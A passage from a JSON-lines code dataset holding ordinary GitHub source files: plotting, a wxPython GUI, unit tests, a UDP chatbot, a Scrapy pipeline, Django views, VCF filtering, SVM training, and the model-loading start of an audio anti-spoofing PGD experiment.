pd.read_csv(test_target_inpath)\n\nacc_list1 = ensemble(predictions,weights1,test_target)\nacc_list2 = ensemble(predictions,weights2,test_target)\nacc_list3 = ensemble(predictions,weights3,test_target)\nacc_list4 = ensemble(predictions,weights4,test_target)\n\nplt.figure(figsize = (16,8))\n\nplt.plot(acc_list1,color='red',label='Equal')\nplt.plot(acc_list2,'b--',label='Accuracy')\nplt.plot(acc_list3,color='green',label='ReLu_Lin')\nplt.plot(acc_list4,color='yellow',label='ReLu_Exp')\n\nplt.title('Accuracy vs. # of Models')\nplt.xlabel('# of Models')\nplt.ylabel('Accuracy')\nplt.ylim(bottom=0.4)\nplt.legend()\nplt.savefig(figure_path)\n","repo_name":"pjourgensen/Gene-Selection","sub_path":"Scripts/acc_plot.py","file_name":"acc_plot.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72363141663","text":"# -*- coding: utf-8 -*-\n\"\"\"\n`*View` classes are used to take a closer look at certain objects.\n\"\"\"\n\nimport wx\nimport re\nimport card\nfrom deck import Deck\nimport utilities\n\n\n######################\n# DeckView Class\n######################\n\nclass DeckView(utilities.AutoSize):\n \"\"\"Displays a \"minimap\" of the current `Deck`. Uses `MiniCard` to represent a `Card` on the `Deck`.\"\"\"\n\n DEFAULT_FACTOR = 5\n BACKGROUND_CL = (255, 255, 255, 255)\n DEFAULT_MINI_CL = (220, 218, 213, 255)\n \n def __init__(self, parent, deck=None, pos=wx.DefaultPosition, size=wx.DefaultSize):\n \"\"\"Constructor.\n\n * `parent: ` the parent `Box`.\n * `deck: ` the `Deck` we are viewing.\n * `pos: ` by default, is `wx.DefaultSize`.\n * `size: ` by default, is `wx.DefaultSize`.\n \"\"\"\n super(DeckView, self).__init__(parent, pos=pos, size=size)\n\n # members \n self.factor = DeckView.DEFAULT_FACTOR\n self.cards = {}\n self.SetBackgroundColour(self.BACKGROUND_CL)\n self.SetDeck(deck)\n\n # bindings\n self.Bind(wx.EVT_SHOW, self.OnShow)\n\n\n ## Behavior functions\n\n def Clear(self):\n \"\"\"Delete all `MiniCard`s from this view.\"\"\"\n self.cards = {}\n\n def SetDeck(self, deck):\n \"\"\"Sets the `Deck` we are going to view.\n \n * `deck: ` a `Deck`.\n \"\"\"\n self.Clear()\n for c in deck.GetCards():\n self.AddCard(c)\n\n # set size, fixed for scale/zoom\n sz = [i / self.factor for i in deck.GetSize()]\n self.SetSize(sz)\n self.UpdateContentSize(deck.content_sz)\n\n step = deck.GetScrollPixelsPerUnit()\n self.SetScrollRate(step[0] / self.factor, step[1] / self.factor)\n\n deck.Bind(Deck.EVT_NEW_CARD, self.OnNewCard)\n deck.Bind(wx.EVT_SIZE, self.OnDeckSize)\n deck.Bind(wx.EVT_SCROLLWIN, self.OnDeckScroll)\n \n self.deck = deck\n \n def AddCard(self, card):\n \"\"\"Adds a new `MiniCard`.\"\"\"\n r = wx.Rect(*[i / self.factor for i in card.GetRect()])\n mini = MiniCard(self, pos=(r.left, r.top), size=(r.width, r.height))\n\n if isinstance(card, Content):\n mini.SetBackgroundColour(card.GetBackgroundColour())\n else:\n mini.SetBackgroundColour(self.DEFAULT_MINI_CL)\n\n card.Bind(Card.EVT_DELETE, self.OnDeleteCard)\n if isinstance(card, Content):\n card.Bind(Content.EVT_CONT_KIND, self.OnContentKind)\n\n # retain a reference to the original, for deleting\n self.cards[card] = mini\n\n def RemoveCard(self, card):\n \"\"\"Remove a `MiniCard`.\"\"\"\n if card in self.cards.keys():\n mini = self.cards[card]\n mini.Hide()\n mini.Destroy()\n del self.cards[card]\n\n def SetPosition(self):\n \"\"\"Calculates position relative to the `Deck`.\"\"\"\n w, h = self.GetSize()\n rect = self.deck.GetClientRect()\n pos = (rect.right - w, rect.bottom - h)\n self.Move(pos)\n\n\n ### Callbacks\n\n def OnShow(self, ev):\n \"\"\"Listens to `wx.EVT_SHOW`.\"\"\"\n self.SetPosition()\n\n def OnDeckScroll(self, ev):\n \"\"\"Listens to `wx.EVT_SCROLLWIN` from the underlying `Deck`.\"\"\"\n view = ev.GetEventObject().GetViewStart()\n self.Scroll(view.x / self.factor, view.y / self.factor)\n\n def OnDeckSize(self, ev):\n \"\"\"Listens to `wx.EVT_SIZE` from the underlying `Deck`.\"\"\"\n self.SetSize([i / self.factor + 30 for i in self.deck.GetSize()])\n self.SetPosition()\n\n def OnNewCard(self, ev):\n \"\"\"Listens to `Deck.EVT_NEW_CARD`.\"\"\"\n self.AddCard(ev.GetEventObject())\n\n def OnDeleteCard(self, ev):\n \"\"\"Listens to `Card.EVT_DELETE` from each `Card` on the `Deck`.\"\"\"\n self.RemoveCard(ev.GetEventObject())\n # dont' consume it! Deck also needs it\n ev.Skip()\n\n def OnContentKind(self, ev):\n \"\"\"Listens to `Content.EVT_CONT_KIND` events from each `Content`.\"\"\"\n card = ev.GetEventObject()\n self.cards[card].SetBackgroundColour(card.GetBackgroundColour())\n \n\n\n######################\n# CardView Class\n###################### \n\nclass CardView(wx.Panel):\n \"\"\"Displays a screen-sized `Content` `Card` to facilitate editing. While\n viewing, the `Card`s are `Reparent`ed to this window.\n \"\"\"\n \n CARD_PADDING = Deck.CARD_PADDING\n BACKGROUND_CL = \"#CCCCCC\"\n \n TITLE_FONT = (18, wx.SWISS, wx.ITALIC, wx.BOLD)\n CONTENT_FONT = (14, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)\n\n def __init__(self, parent, cards=[], pos=wx.DefaultPosition, size=wx.DefaultSize):\n \"\"\"Constructor.\n\n * `parent: ` the parent `Box`.\n * `cards: ` the `Card`s we are viewing.\n * `pos: ` by default, is `wx.DefaultSize`.\n * `size: ` by default, is `wx.DefaultSize`.\n \"\"\"\n super(CardView, self).__init__(parent, size=size)\n \n # GUI\n self.SetBackgroundColour(self.BACKGROUND_CL)\n hbox = wx.BoxSizer(wx.HORIZONTAL)\n self.SetSizer(hbox)\n\n # members\n self.cards = {}\n\n \n ### Behavior functions\n\n def GetCards(self):\n \"\"\"Returns the `Card`s currently under viewing.\n\n `returns: ` a `list` of `Card`s.\n \"\"\"\n return self.cards.keys()\n\n def AddCard(self, crd):\n \"\"\"Adds one `Card` to the viewing control.\n\n * `card: ` a `Card`.\n \"\"\"\n # setup and reparent: wil restore parent when done. See RestoreCards.\n self.cards[crd] = {}\n self.cards[crd][\"parent\"] = crd.GetParent()\n self.cards[crd][\"rect\"] = crd.GetRect()\n crd.Reparent(self)\n crd.SetViewing(True)\n crd.content.SetFocus()\n \n # setup UI\n box = self.GetSizer()\n box.Add(crd, proportion=1, flag=wx.ALL|wx.EXPAND, border=self.CARD_PADDING)\n box.Layout()\n\n # bindings\n crd.Bind(card.Card.EVT_CANCEL_VIEW, self.OnCancelView)\n\n def SetCards(self, cards):\n \"\"\"Clears previous `Card`s and views the new ones.\n\n * `cards: ` a `list` of `Card`s.\n \"\"\"\n self.Clear()\n for c in cards: self.AddCard(c)\n\n def Restore(self):\n \"\"\"Restores the viewed `Card`s to their original parents and positions.\"\"\"\n for c in self.cards:\n c.Reparent(self.cards[c][\"parent\"])\n c.SetRect(self.cards[c][\"rect\"])\n self.Clear()\n\n def Clear(self):\n \"\"\"Clear all viewed `Card`s.\"\"\"\n self.GetSizer().Clear()\n for c in self.cards.keys():\n c.SetViewing(False)\n self.cards = {}\n\n\n ### Callbacks\n\n def OnCancelView(self, ev):\n \"\"\"Listens to `Card.EVT_CANCEL_VIEW` on every viewed `Card`.\"\"\"\n self.Restore()\n event = card.Card.CancelViewEvent(id=wx.ID_ANY)\n event.SetEventObject(ev.GetEventObject())\n self.GetEventHandler().ProcessEvent(event)\n \n\n\n######################\n# MiniCard Class\n###################### \n\nclass MiniCard(wx.Window):\n \"\"\"The little cards shown in a `DeckView`\"\"\"\n \n def __init__(self, parent, pos=wx.DefaultPosition, size=wx.DefaultSize):\n \"\"\"Constructor.\n\n * `parent: ` the parent `DeckView`.\n * `pos: ` by default, is `wx.DefaultSize`.\n * `size: ` by default, is `wx.DefaultSize`.\n \"\"\"\n super(MiniCard, self).__init__(parent, pos=pos, size=size)\n \n self.SetBackgroundColour(\"#FFFFFF\")\n\n\n\n######################\n# TagView Class\n###################### \n\nclass TagView(wx.Panel):\n \"\"\"The sidebard that displays a `Content` `Card`'s tags.\"\"\"\n\n TAGS_REGEX = \"^(\\w+):(.*)$\"\n \n def __init__(self, parent, deck, pos=wx.DefaultPosition, size=wx.DefaultSize):\n \"\"\"Constructor.\n\n * `parent: ` the parent `Box`.\n * `deck: ` the parent `Deck` of the `Card`s we are viewing.\n * `pos: ` by default, is `wx.DefaultSize`.\n * `size: ` by default, is `wx.DefaultSize`.\n \"\"\"\n super(TagView, self).__init__(parent, pos=pos, size=size)\n self.deck = deck\n self.InitUI()\n\n # bindings\n self.Bind(wx.EVT_SHOW, self.OnShow)\n deck.Bind(Deck.EVT_NEW_CARD, self.OnNewCard)\n\n\n ### Behavior functions\n\n def ParseTags(self, txt):\n \"\"\"Parses a string looking for tags.\n\n * `txt: ` a string, the contents of a `Content`.\n\n `returns: ` a string to display in the `TagView` view, representing the tags found in `text`.\n \"\"\"\n string = \"\"\n results = re.findall(self.TAGS_REGEX, txt, re.MULTILINE)\n for tag, val in results:\n string += tag + \":\" + val\n string += \"\\n\\n\"\n return string\n\n def ShowTags(self, card):\n \"\"\"Shows the `card`'s tags.\n\n * `card: ` a `Content`, whose contents will be parsed.\n \"\"\"\n self.txt.SetValue(self.ParseTags(card.GetContent()))\n \n \n ### Auxiliary functions\n\n def InitUI(self):\n \"\"\"Initialize this window's GUI and controls.\"\"\"\n box = wx.BoxSizer(wx.VERTICAL)\n self.SetSizer(box)\n\n txt = wx.TextCtrl(self, style=wx.TE_MULTILINE)\n self.txt = txt \n box.Add(txt, proportion=1, flag=wx.ALL|wx.EXPAND, border=1)\n\n\n ### Callbacks\n\n def OnShow(self, ev):\n \"\"\"Listens to `wx.EVT_SHOW`.\"\"\"\n if ev.IsShown():\n crd = utilities.GetCardAncestor(self.FindFocus())\n if crd and isinstance(crd, card.Content):\n self.ShowTags(crd)\n\n def OnNewCard(self, ev):\n \"\"\"Listens to `Deck.EVT_NEW_CARD`.\"\"\"\n card = ev.GetEventObject()\n for ch in card.GetChildren():\n ch.Bind(wx.EVT_SET_FOCUS, self.OnCardChildFocus)\n\n def OnCardChildFocus(self, ev):\n \"\"\"Listens to `wx.EVT_SET_FOCUS` on every `Card`.\"\"\"\n card = utilities.GetCardAncestor(ev.GetEventObject())\n if self.IsShown():\n self.ShowTags(card)\n ev.Skip()\n\n\n\n###########################\n# pdoc documentation setup\n###########################\n# __pdoc__ is the special variable from the automatic\n# documentation generator pdoc.\n# By setting pdoc[class.method] to None, we are telling\n# pdoc to not generate documentation for said method.\n__pdoc__ = {}\n__pdoc__[\"field\"] = None\n\n# Since we only want to generate documentation for our own\n# mehods, and not the ones coming from the base classes,\n# we first set to None every method in the base class.\nfor field in dir(utilities.AutoSize):\n __pdoc__['DeckView.%s' % field] = None\nfor field in dir(wx.Panel):\n __pdoc__['CardView.%s' % field] = None\nfor field in dir(wx.Window):\n __pdoc__['MiniCard.%s' % field] = None\nfor field in dir(wx.Panel):\n __pdoc__['TagView.%s' % field] = None\n\n# Then, we have to add again the methods that we have\n# overriden. See https://github.com/BurntSushi/pdoc/issues/15.\nfor field in DeckView.__dict__.keys():\n if 'DeckView.%s' % field in __pdoc__.keys():\n del __pdoc__['DeckView.%s' % field]\nfor field in CardView.__dict__.keys():\n if 'CardView.%s' % field in __pdoc__.keys():\n del __pdoc__['CardView.%s' % field]\nfor field in MiniCard.__dict__.keys():\n if 'MiniCard.%s' % field in __pdoc__.keys():\n del __pdoc__['MiniCard.%s' % field]\nfor field in TagView.__dict__.keys():\n if 'TagView.%s' % field in __pdoc__.keys():\n del __pdoc__['TagView.%s' % field]\n","repo_name":"leotrs/threepy5","sub_path":"threepy5/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":11451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22537209133","text":"from unittest import TestCase, main\nfrom unittest.mock import patch\nfrom test_helper import run_test\n\nclass TestBlackjack(TestCase):\n\n @patch('blackjack_helper.randint')\n @patch('builtins.input')\n def test_example(self, input_mock, randint_mock):\n '''\n Both the dealer and user receive cards that end up with a hand less than 21.\n The dealer wins by having a higher hand than the user.\n\n This does not count as one of your tests.\n '''\n output = run_test([3, 5, 8], ['y', 'n'], [3, 5, 10], randint_mock, input_mock)\n expected = \"-----------\\n\" \\\n \"YOUR TURN\\n\" \\\n \"-----------\\n\" \\\n \"Drew a 3\\n\" \\\n \"Drew a 5\\n\" \\\n \"You have 8. Hit (y/n)? y\\n\" \\\n \"Drew an 8\\n\" \\\n \"You have 16. Hit (y/n)? n\\n\" \\\n \"Final hand: 16.\\n\" \\\n \"-----------\\n\" \\\n \"DEALER TURN\\n\" \\\n \"-----------\\n\" \\\n \"Drew a 3\\n\" \\\n \"Drew a 5\\n\" \\\n \"Dealer has 8.\\n\" \\\n \"Drew a 10\\n\" \\\n \"Final hand: 18.\\n\" \\\n \"-----------\\n\" \\\n \"GAME RESULT\\n\" \\\n \"-----------\\n\" \\\n \"Dealer wins!\\n\"\n self.assertEqual(output, expected)\n\n # Make sure all your test functions start with test_ \n # Follow indentation of test_example\n # WRITE ALL YOUR TESTS BELOW. Do not delete this line.\n\n # Write all your tests above this. Do not delete this line.\n\nif __name__ == '__main__':\n main()\n","repo_name":"Henrywis/BlackJack","sub_path":"test_blackjack.py","file_name":"test_blackjack.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"15790398754","text":"# Palatip Wongyeekul (5910406329)\n# Phatchanya Chongsheveewat (5910406337)\n\nfrom socket import *\nfrom tinydb import TinyDB, where\nimport random\ndb = TinyDB('db.json')\nkey = [\"\",\"\"]\ndef addword(clientAddress):\n\t\n\tserverSocket.sendto(\"Question : \".encode(),clientAddress)\n\tmessage, clientAddress = serverSocket.recvfrom(2048)\n\tmodifiedMessage = message.decode()\n\tkey[0] = modifiedMessage\n\t\n\t\n\tserverSocket.sendto(\"Answer : \".encode(),clientAddress)\n\tmessage, clientAddress = serverSocket.recvfrom(2048)\n\tmodifiedMessage = message.decode()\n\tkey[1] = modifiedMessage\n\tdb.insert({key[0]:key[1]})\n\t\n\tserverSocket.sendto(\"200\".encode(),clientAddress)\n\nserverPort = 12002\nserverSocket = socket(AF_INET, SOCK_DGRAM)\nserverSocket.bind(('', serverPort))\nprint ('The server is ready to receive') \nwhile 1:\n\tmessage, clientAddress = serverSocket.recvfrom(2048)\n\tmodifiedMessage = message.decode()\n\tprint(modifiedMessage)\n\ta = db.search(where(modifiedMessage))\n\tif a == []:\n\t\tserverSocket.sendto(\"Add word (y/n) ?\".encode(),clientAddress)\n\t\tmessage, clientAddress = serverSocket.recvfrom(2048)\n\t\tmodifiedMessage = message.decode()\n\t\tif(modifiedMessage=='Y' or modifiedMessage=='y'):\n\t\t\taddword(clientAddress)\n\t\telse:\n\t\t\tserverSocket.sendto(\"404\".encode(),clientAddress)\n\t\t\tcontinue\n\telse:\n\t\ta = random.choice([a for a in db.search(where(modifiedMessage))]) \n\t\tserverSocket.sendto(a[modifiedMessage].encode(),clientAddress)\n ","repo_name":"iphatchanya/miniChatbot","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18934645610","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nfrom itemadapter import ItemAdapter\n\nimport sqlite3\n\nclass AmzbooksPipeline:\n def __init__(self):\n self.create_conn()\n self.create_table()\n def create_conn(self):\n self.conn = sqlite3.connect(\"documents.db\")\n\n #we call cursor\n self.curr= self.conn.cursor()\n\n def create_table(self):\n #from cursor we call method execute to do these queries\n self.curr.execute(\"\"\"DROP TABLE IF EXISTS docs_tb\"\"\")\n self.curr.execute(\"\"\"create table docs_tb(Title text,Authors text,Cited_by text,description text)\"\"\")\n\n def process_item(self, item, spider):\n #store only items from spider named info\n #else return item\n if spider.name not in ['info']:\n return item\n else:\n self.store_db(item)\n return item\n\n def store_db(self,item):\n #insert title,author,citation,page source into db\n self.curr.execute(\"\"\"insert into docs_tb values (?,?,?,?)\"\"\",(\n item['title'][0],\n\n #get all authors on the same line\n [item['author']][0],\n item['cited_by'][0],\n item['file'][0]\n ))\n self.conn.commit()\n\n","repo_name":"XaraKat/Scrapy-Books","sub_path":"books/amzbooks/amzbooks/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7720767200","text":"class Solution:\n def knightProbability(self, n: int, k: int, row: int, column: int) -> float:\n \n next_diffs = [\n (-1,-2),\n (-2,-1),\n (-2,1),\n (-1,2),\n (1,2),\n (2,1),\n (2,-1),\n (1,-2)\n ]\n \n is_in_bounds = lambda coord: all(map(lambda pos : 0<=pos None:\n \"\"\"\n Chosen LineIndex set to start of highlighted area\n \"\"\"\n if line_start <= line_end:\n # downward highlight or the same line\n self.chosen_line_index = line_start\n self.chosen_letter_index = letter_start\n else: # upward highlight\n self.chosen_line_index = line_end\n self.chosen_letter_index = letter_end\n\n\ndef jump_to_end(self, line_start, line_end, letter_start, letter_end) -> None:\n \"\"\"\n Chosen LineIndex set to end of highlighted area\n \"\"\"\n if line_start <= line_end:\n # downward highlight or the same line\n self.chosen_line_index = line_end\n self.chosen_letter_index = letter_end\n else: # upward highlight\n self.chosen_line_index = line_start\n self.chosen_letter_index = letter_start\n\n\ndef reset_after_highlight(self) -> None:\n \"\"\"\n Reset caret, clickdown_cycles and dragged booleans.\n \"\"\"\n self.dragged_active = False # deactivate highlight\n self.dragged_finished = True # highlight is finished\n self.update_caret_position() # update caret position to chosen_Index (Line+Letter)\n self.last_clickdown_cycle = 0 # reset drag-cycle\n self.last_clickup_cycle = -1\n self.render_line_numbers_flag = True\n\n if len(self.editor_lines) <= self.showable_line_numbers_in_editor:\n self.first_showable_line_index = 0 # update first showable line\n","repo_name":"CribberSix/pygame-texteditor","sub_path":"src/pygame_texteditor/_other.py","file_name":"_other.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"7"} +{"seq_id":"13591503893","text":"import json\n\ndata = {}\nQState = {'status':{'R':0,'Q':0,'H':0},'qstate':{}}\nwith open('jsonoutput.json','r') as fp:\n data = json.load(fp)\n \nfor k in data.keys():\n if(data[k]['State']=='R'):\n QState['status']['R'] += 1\n elif(data[k]['State']=='Q'):\n QState['status']['Q'] += 1\n if(data[k]['Queue'] not in QState['qstate'].keys()):\n QState['qstate'][data[k]['Queue']] = 1\n else:\n QState['qstate'][data[k]['Queue']] += 1\n elif(data[k]['State']=='H'):\n QState['status']['H'] += 1\n \nwith open('QState.json','w') as fp:\n json.dump(QState,fp)","repo_name":"iamashish7/MAP","sub_path":"code/realtime/2010/calcQState.py","file_name":"calcQState.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"35941759040","text":"from django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import get_object_or_404, render\nfrom django.template import loader\nfrom django.urls import reverse\n\nfrom basketapp.models import BasketItem\nfrom mainapp.models import Product\n\n\n@login_required\ndef index(request):\n basket_items = request.user.user_basket.all()\n context = {\n 'page_title': 'корзина',\n 'basket_items': basket_items,\n }\n return render(request, 'basketapp/index.html', context)\n\n\n@login_required\ndef add(request, pk):\n if 'login' in request.META.get('HTTP_REFERER'):\n return HttpResponseRedirect(\n reverse(\n 'main:product_page',\n kwargs={'pk': pk}\n )\n )\n\n product = get_object_or_404(Product, pk=pk)\n basket = BasketItem.objects.filter(user=request.user, product=product).first()\n\n if not basket:\n basket = BasketItem(user=request.user, product=product)\n\n basket.quantity += 1\n basket.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n@login_required\ndef delete(request, pk):\n get_object_or_404(BasketItem, pk=pk).delete()\n return HttpResponseRedirect(reverse('basket:index'))\n\n\ndef change(request, pk, quantity):\n if request.is_ajax():\n basket_item = BasketItem.objects.filter(pk=pk).first()\n if quantity == 0:\n basket_item.delete()\n else:\n # quantity validation\n basket_item.quantity = quantity\n basket_item.save()\n\n context = {\n 'basket_items': request.user.user_basket.all(),\n }\n\n basket_items = loader.render_to_string(\n 'basketapp/inc/inc__basket_items.html',\n context=context,\n request=request, # csrf token update\n )\n\n return JsonResponse({\n 'basket_items': basket_items,\n })\n","repo_name":"AlexeyDubrov/Django_geekshop","sub_path":"geekshop/basketapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"25066158978","text":"import argparse\nimport requests\nimport gzip\nimport os\nimport re\nfrom api_request import get_variant_gene\nfrom io import BytesIO\n\n\ndef verify_DP(input_string, minDP):\n if minDP is None:\n return True\n else:\n pattern = \"DP=([^;]+)\"\n match = re.search(pattern, input_string)\n if match and int(match.group(1)) > minDP:\n return True\n else:\n return None\n\n\ndef is_between(value, lower_bound, upper_bound):\n if lower_bound is None and upper_bound is None:\n return True # Both bounds are None, so there's no valid range.\n elif lower_bound is None:\n return value <= upper_bound\n elif upper_bound is None:\n return value >= lower_bound\n else:\n return lower_bound <= value <= upper_bound\n\n\ndef create_file(name, header, line):\n # Directory where you want to create the files\n output_directory = \"filtered_samples\"\n\n os.makedirs(output_directory, exist_ok=True)\n\n header = \"\\n\".join(header)\n formatted_name = name.replace(\"./.:.:.:.:.:.:.\", \"\")\n formatted_name = re.sub(r'[:/\\\\]', ' ', formatted_name)\n\n file_path = os.path.join(output_directory, f\"{formatted_name}_filtered.vcf\")\n\n if os.path.exists(file_path):\n with open(file_path, \"a\") as file:\n file.write(line + \"\\n\")\n else:\n with open(file_path, \"w\") as file:\n file.write(header + \"\\n\")\n file.write(line + \"\\n\")\n pass\n\n\ndef parse_vcf_arguments():\n parser = argparse.ArgumentParser(description=\"Process a VCF file and split it into different output files.\")\n\n # Mandatory parameter\n parser.add_argument(\"limit\", type=int, help=\"Limit parameter (must be an int < 10)\")\n\n # Optional parameters\n parser.add_argument(\"--start\", type=int, help=\"Start parameter\")\n parser.add_argument(\"--end\", type=int, help=\"End parameter\")\n parser.add_argument(\"--minDP\", type=int, help=\"minDP parameter\")\n\n args = parser.parse_args()\n\n # Validate limit parameter\n if args.limit >= 10 or args.limit < 0:\n parser.error(\"Limit must be an integer less than 10.\")\n\n return args\n\n\ndef process_vcf_line(line, header_lines, CHROM_index, REF_index, ALT_index, father_index, mother_index, proband_index,\n POS_index, INFO_index, start, end, minDP):\n fields = line.strip().split('\\t')\n if is_between(int(fields[POS_index]), start, end):\n if verify_DP(fields[INFO_index], minDP):\n sample = f\"{fields[father_index]} {fields[mother_index]} {fields[proband_index]}\"\n new_info = f\"{fields[INFO_index]};GENE={get_variant_gene(fields[CHROM_index], int(fields[POS_index]), fields[REF_index], fields[ALT_index], 'hg19')}\"\n fields[INFO_index] = new_info\n new_line = \"\\t\".join(fields)\n create_file(sample, header_lines, new_line)\n\n\ndef main():\n args = parse_vcf_arguments()\n\n print(\"Parsed parameters:\")\n print(f\"Limit: {args.limit}\")\n print(f\"Start: {args.start}\")\n print(f\"End: {args.end}\")\n print(f\"minDP: {args.minDP}\")\n\n # URL of the gzipped VCF file\n url = \"https://s3.amazonaws.com/resources.genoox.com/homeAssingment/demo_vcf_multisample.vcf.gz\"\n response = requests.get(url, stream=True)\n\n header_lines = []\n if response.status_code == 200:\n # Create a stream to read the gzipped content\n compressed_stream = BytesIO(response.content)\n with gzip.GzipFile(fileobj=compressed_stream, mode='rb') as gzipped_file:\n\n for line in gzipped_file:\n line = line.decode('utf-8').rstrip()\n if line.startswith(\"#CHROM\"):\n header_lines.append(line)\n header = line.strip().split('\\t')\n CHROM_index = header.index(\"#CHROM\")\n REF_index = header.index(\"REF\")\n ALT_index = header.index(\"ALT\")\n father_index = header.index(\"father\")\n mother_index = header.index(\"mother\")\n proband_index = header.index(\"proband\")\n POS_index = header.index(\"POS\")\n INFO_index = header.index(\"INFO\")\n break\n elif line.startswith('#'):\n header_lines.append(line)\n for line in gzipped_file:\n line = line.decode('utf-8').rstrip()\n process_vcf_line(line, header_lines, CHROM_index, REF_index, ALT_index, father_index, mother_index,\n proband_index, POS_index, INFO_index, args.start, args.end, args.minDP)\n\n else:\n print(\"Failed to download the file:\", response.status_code)\n\n print(\"Finished successfuly\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"SemionChi/VCF_processing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71543284705","text":"from sklearn.cross_validation import KFold\nfrom sklearn.externals import joblib\nfrom sklearn import grid_search\nfrom sklearn.svm import SVC\nimport numpy as np\nimport pandas\n\ndata_face = pandas.read_csv(\"daisy/daisy_features_face.csv\", header=None)\ndata_le = pandas.read_csv(\"daisy/daisy_features_le.csv\", header=None)\ndata_re = pandas.read_csv(\"daisy/daisy_features_re.csv\", header=None)\ndata_nose = pandas.read_csv(\"daisy/daisy_features_nose.csv\", header=None)\n\nX = pandas.concat([data_face.iloc[:, :-1], data_le.iloc[:, :-1], data_re.iloc[:, :-1], data_nose.iloc[:, :-1]], axis=1)\ny = data_face.iloc[:, -1]\n\n\nprint(data_face.shape, data_le.shape, data_re.shape, data_nose.shape)\nprint(X.shape)\ny = [int(x) for x in y.tolist()]\nprint(y)\n\ndef train(grid, X, y):\n print('Tuning hyper-parameters with {0} kernel'.format(grid['kernel'][0]))\n\n cv = KFold(len(y), n_folds=5, shuffle=True, random_state=241)\n gs = grid_search.GridSearchCV(SVC(random_state=241, decision_function_shape='ovr'), grid, scoring='accuracy', cv=cv, verbose=3)\n gs.fit(X, y)\n\n print('Model training is finished.\\n')\n print('Best params: {0}. Best score: {1}'.format(gs.best_params_, gs.best_score_))\n print(gs.get_params(deep=True))\n print('')\n joblib.dump(gs, './clfs/daisy/{0}/svm_daisy_clf.pkl'.format(grid['kernel'][0]))\n\ngrid1 = {\n 'kernel': ['linear'],\n 'C': np.power(10.0, np.arange(-5, 6))\n}\ngrid2 = {\n 'kernel': ['rbf'],\n # 'gamma': np.power(2.0, np.arange(-4, 5)),\n # 'C': np.power(10.0, np.arange(0, 6))\n 'gamma': np.power(2.0, np.arange(-10, 3)),\n 'C': np.power(10.0, np.arange(-2, 6))\n}\n# train(grid1, X, y)\n# train(grid2, X, y)","repo_name":"goodmove/FindyBot","sub_path":"src/image_processing/ML/daisy/est_daisy.py","file_name":"est_daisy.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"3373358760","text":"from Prove.paint_pgd_ens3 import paint_PGD_ens3\n\nimport Config.attackconfig as Config\nimport Config.globalconfig as Gconfig\nimport torch\nfrom RawNet56.model import RawNet as RawNet56\nfrom RawNet4.model import RawNet as RawNet4\nfrom RawNet4.model import RawNet as RawNet48\nfrom RawNet646.model import RawNet as RawNet646\nfrom RawNet726.model import RawNet as RawNet726\nimport yaml\n\nlabelPath = Config.TLABEL\ndatasetPath = Config.TPATH\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\nmodel56_path = Config.RawNet56_model\nyaml56_path = Gconfig.RAW56_YAML_CONFIG_PATH\nwith open(yaml56_path, 'r') as f_yaml:\n parser1 = yaml.load(f_yaml, Loader=yaml.FullLoader)\nmodel56 = RawNet56(parser1['model'], device)\nmodel56 = (model56).to(device)\nmodel56.load_state_dict(torch.load(model56_path, map_location=device))\nprint('Model loaded : {}'.format(model56_path))\n\n# model56_path2 = Config.RawNet56_model_2\n# with open(yaml56_path, 'r') as f_yaml:\n# parser1 = yaml.load(f_yaml, Loader=yaml.FullLoader)\n# model56_2 = RawNet56(parser1['model'], device)\n# model56_2 = (model56_2).to(device)\n# model56_2.load_state_dict(torch.load(model56_path2, map_location=device))\n# print('Model loaded : {}'.format(model56_path2))\n#\nmodel4_path = Config.RawNet4_model\nyaml4_path = Gconfig.RAW4_YAML_CONFIG_PATH\nwith open(yaml4_path, 'r') as f_yaml:\n parser1 = yaml.load(f_yaml, Loader=yaml.FullLoader)\nmodel4 = RawNet4(parser1['model'], device)\nmodel4 = (model4).to(device)\nmodel4.load_state_dict(torch.load(model4_path, map_location=device))\nprint('Model loaded : {}'.format(model4_path))\n\n# model48_path = Config.RawNet48_model\n# yaml48_path = Gconfig.RAW48_YAML_CONFIG_PATH\n# with open(yaml48_path, 'r') as f_yaml:\n# parser1 = yaml.load(f_yaml, Loader=yaml.FullLoader)\n# model48 = RawNet48(parser1['model'], device)\n# model48 = (model48).to(device)\n# model48.load_state_dict(torch.load(model48_path, map_location=device))\n# print('Model loaded : {}'.format(model48_path))\n\nmodel726_path = Config.RawNet726_model\nyaml726_path = Gconfig.RAW726_YAML_CONFIG_PATH\nwith open(yaml726_path, 'r') as f_yaml:\n parser1 = 